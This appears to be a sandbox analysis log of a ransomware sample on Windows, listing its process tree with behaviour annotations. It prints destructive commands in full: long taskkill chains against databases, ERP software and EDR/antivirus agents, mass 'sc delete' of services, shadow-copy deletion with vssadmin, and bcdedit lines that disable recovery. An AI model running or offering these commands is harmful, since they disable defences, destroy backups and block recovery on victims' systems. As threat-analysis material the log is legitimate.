@taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"4⤵PID:1016
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSDS.exe /F5⤵PID:208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mysqld.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer_Service.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CasLicenceServer.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_w32.exe /F5⤵PID:2160
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_x64.exe /F5⤵PID:3020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rdm.exe /F5⤵PID:2968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRT.exe /F5⤵
- Kills process with taskkill
PID:2568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRTPortable.exe /F5⤵PID:2652
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBox.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSVC.exe /F5⤵
- Kills process with taskkill
PID:2264
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBoxVM.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM abs_deployer.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_monitor.exe /F5⤵PID:2988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfupdatemgr.exe /F5⤵PID:2236
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ipc_proxy.exe /F5⤵PID:2360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_agent.exe /F5⤵PID:1312
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_sec_plan.exe /F5⤵PID:2920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfavsvc.exe /F5⤵PID:2840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxMonitorService.exe /F5⤵PID:2208
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxService.exe /F5⤵PID:1864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchangeService.exe /F5⤵PID:1960
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchange.NodeService.ein /F5⤵PID:3044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM perl.exe /F5⤵PID:2616
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F5⤵PID:1864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM emagent.exe /F5⤵PID:2436
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsServer.exe /F5⤵PID:1264
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AppMain.exe /F5⤵PID:292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM easservice.exe /F5⤵PID:2448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""4⤵PID:1396
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1ClrAgent5⤵PID:228
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleOraDb11g_home1TNSListener5⤵PID:544
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleServiceORCL5⤵PID:1640
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL5⤵PID:1764
-
-
C:\Windows\SysWOW64\sc.exesc delete aspnet_state @sc delete Redis5⤵PID:544
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleVssWriterORCL5⤵PID:216
-
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService5⤵PID:2200
-
-
C:\Windows\SysWOW64\sc.exesc delete JhTask5⤵PID:2092
-
-
C:\Windows\SysWOW64\sc.exesc delete XT800Service_Personal5⤵PID:2416
-
-
C:\Windows\SysWOW64\sc.exesc delete MCService5⤵PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc delete ImeDictUpdateService5⤵PID:2840
-
-
C:\Windows\SysWOW64\sc.exesc delete allpass_redisservice_port211605⤵PID:3008
-
-
C:\Windows\SysWOW64\sc.exesc delete "Flash Helper Service"5⤵PID:2168
-
-
C:\Windows\SysWOW64\sc.exesc delete "Kiwi Syslog Server"5⤵PID:2388
-
-
C:\Windows\SysWOW64\sc.exesc delete "UWS HiPriv Services"5⤵PID:2784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"4⤵PID:1304
-
C:\Windows\SysWOW64\sc.exesc delete "DAService_TCP"5⤵PID:1640
-
-
C:\Windows\SysWOW64\sc.exesc delete "eCard-TTransServer"5⤵PID:968
-
-
C:\Windows\SysWOW64\sc.exesc delete eCardMPService5⤵PID:236
-
-
C:\Windows\SysWOW64\sc.exesc delete EnergyDataService5⤵PID:916
-
-
C:\Windows\SysWOW64\sc.exesc delete UI0Detect5⤵PID:968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop xenlite6⤵PID:1948
-
-
-
C:\Windows\SysWOW64\sc.exesc delete WebAttendServer5⤵PID:2184
-
-
C:\Windows\SysWOW64\sc.exesc delete TCPIDDAService5⤵PID:2076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceMid6⤵PID:2256
-
-
-
C:\Windows\SysWOW64\sc.exesc delete K3MobileService5⤵PID:1880
-
-
C:\Windows\SysWOW64\sc.exesc delete UIODetect5⤵PID:2292
-
-
C:\Windows\SysWOW64\sc.exesc delete "wanxiao-monitor"5⤵PID:2736
-
-
C:\Windows\SysWOW64\sc.exesc delete VMAuthdService5⤵PID:2952
-
-
C:\Windows\SysWOW64\sc.exesc delete VMUSBArbService5⤵PID:2072
-
-
C:\Windows\SysWOW64\sc.exesc delete VMwareHostd5⤵PID:2376
-
-
C:\Windows\SysWOW64\sc.exesc delete "vm-agent"5⤵PID:2472
-
-
C:\Windows\SysWOW64\sc.exesc delete VmAgentDaemon5⤵PID:2612
-
-
C:\Windows\SysWOW64\sc.exesc delete OpenSSHd5⤵PID:2856
-
-
C:\Windows\SysWOW64\sc.exesc delete eSightService5⤵PID:2104
-
-
C:\Windows\SysWOW64\sc.exesc delete apachezt5⤵PID:2332
-
-
C:\Windows\SysWOW64\sc.exesc delete Jenkins5⤵PID:1272
-
-
C:\Windows\SysWOW64\sc.exesc delete secbizsrv5⤵PID:1168
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLTELEMETRY5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\SysWOW64\sc.exesc delete MSMQ5⤵PID:1568
-
-
C:\Windows\SysWOW64\sc.exesc delete smtpsvrJT5⤵PID:2964
-
-
C:\Windows\SysWOW64\sc.exesc delete zyb_sync5⤵PID:2128
-
-
C:\Windows\SysWOW64\sc.exesc delete 360EntHttpServer5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
C:\Windows\SysWOW64\sc.exesc delete 360EntSvc5⤵PID:2364
-
-
C:\Windows\SysWOW64\sc.exesc delete 360EntClientSvc5⤵PID:1392
-
-
C:\Windows\SysWOW64\sc.exesc delete NFWebServer5⤵PID:2056
-
-
C:\Windows\SysWOW64\sc.exesc delete wampapache5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSEARCH5⤵PID:2244
-
-
C:\Windows\SysWOW64\sc.exesc delete msftesql5⤵PID:2436
-
-
C:\Windows\SysWOW64\sc.exesc delete "SyncBASE Service"5⤵PID:2212
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleDBConcoleorcl5⤵PID:2204
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleJobSchedulerORCL5⤵PID:2732
-
-
C:\Windows\SysWOW64\sc.exesc delete OracleMTSRecoveryService5⤵PID:292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""4⤵PID:1668
-
C:\Windows\SysWOW64\sc.exesc delete SQLSERVERAGENT5⤵PID:1324
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLWriter5⤵PID:684
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLFDLauncher5⤵PID:292
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLBrowser5⤵PID:848
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLSERVER5⤵PID:1864
-
-
C:\Windows\SysWOW64\sc.exesc delete QcSoftService5⤵PID:2192
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQLServerOLAPService5⤵PID:2368
-
-
C:\Windows\SysWOW64\sc.exesc delete VMTools5⤵PID:2580
-
-
C:\Windows\SysWOW64\sc.exesc delete VGAuthService5⤵PID:2848
-
-
C:\Windows\SysWOW64\sc.exesc delete MSDTC5⤵PID:3000
-
-
C:\Windows\SysWOW64\sc.exesc delete TeamViewer5⤵PID:1636
-
-
C:\Windows\SysWOW64\sc.exesc delete ReportServer5⤵PID:2104
-
-
C:\Windows\SysWOW64\sc.exesc delete RabbitMQ5⤵PID:2408
-
-
C:\Windows\SysWOW64\sc.exesc delete "AHS SERVICE"5⤵PID:2540
-
-
C:\Windows\SysWOW64\sc.exesc delete "Sense Shield Service"5⤵PID:2920
-
-
C:\Windows\SysWOW64\sc.exesc delete SSMonitorService5⤵PID:3044
-
-
C:\Windows\SysWOW64\sc.exesc delete SSSyncService5⤵PID:3008
-
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdAppService13005⤵PID:2120
-
-
C:\Windows\SysWOW64\sc.exesc delete MSSQL$SQL20085⤵PID:2492
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLAgent$SQL20085⤵PID:720
-
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdTaskService13005⤵PID:2608
-
-
C:\Windows\SysWOW64\sc.exesc delete TPlusStdUpgradeService13005⤵PID:2052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ClickToRunSvc6⤵PID:2488
-
-
-
C:\Windows\SysWOW64\sc.exesc delete VirboxWebServer5⤵
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
C:\Windows\SysWOW64\sc.exesc delete jhi_service5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\SysWOW64\sc.exesc delete LMS5⤵PID:2840
-
-
C:\Windows\SysWOW64\sc.exesc delete "FontCache3.0.0.0"5⤵PID:2868
-
-
C:\Windows\SysWOW64\sc.exesc delete "OSP Service"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\RegAsm.exe2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368 -
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:968
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵PID:996
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:924
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c bcdedit /set {current} recoveryenabled no3⤵PID:828
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:1060
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Suspicious use of AdjustPrivilegeToken
PID:752
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2068983001083099271205706591149230951513146020241723112464-20840918011943937378"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "182284473442738669-756477640-1443184106-1621301948-140653284317380402471730647231"1⤵PID:1108
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-58310004615409243092134880172-296471503662060705570309398-394985187-1985866473"1⤵PID:1180
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2045284664-315220239-9435209481091545959988669240-873656541563489667-1153452222"1⤵PID:1744
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1475871968-2138289168182407845315702160417535227891191730324-188078883285318172"1⤵PID:1328
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-156301831219656678781306404878-1654138781-17132658181266650791-797478817-1504240584"1⤵PID:924
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-345437780-782954566813228460-546010726-602834746528507592-789921846-1757963189"1⤵PID:108
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1333266436-1223821103127091055912701175-1309652056451110959220124884-472564185"1⤵PID:1836
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1145553636-9840077213388951681086580869-877561187236370301-1644229309-1538843518"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1363766416863211402-987307161-1358849566841518709490194243-13454270881883946723"1⤵PID:792
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-10240546461358594332-7566987811791711778-75316954-1429389673-1469904337576828785"1⤵PID:1820
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1527102612840701519-737210216-1317773988-11705364011912547923-759570549895344240"1⤵PID:1788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMUSBArbService1⤵PID:848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mysqltransport1⤵PID:2344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Synology Drive VSS Service x64"1⤵PID:2360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSComplianceAudit1⤵PID:2336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wanxiao-monitor1⤵PID:2176
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop XenSvc1⤵PID:2164
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance1⤵PID:2480
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NFLicenceServer1⤵PID:3036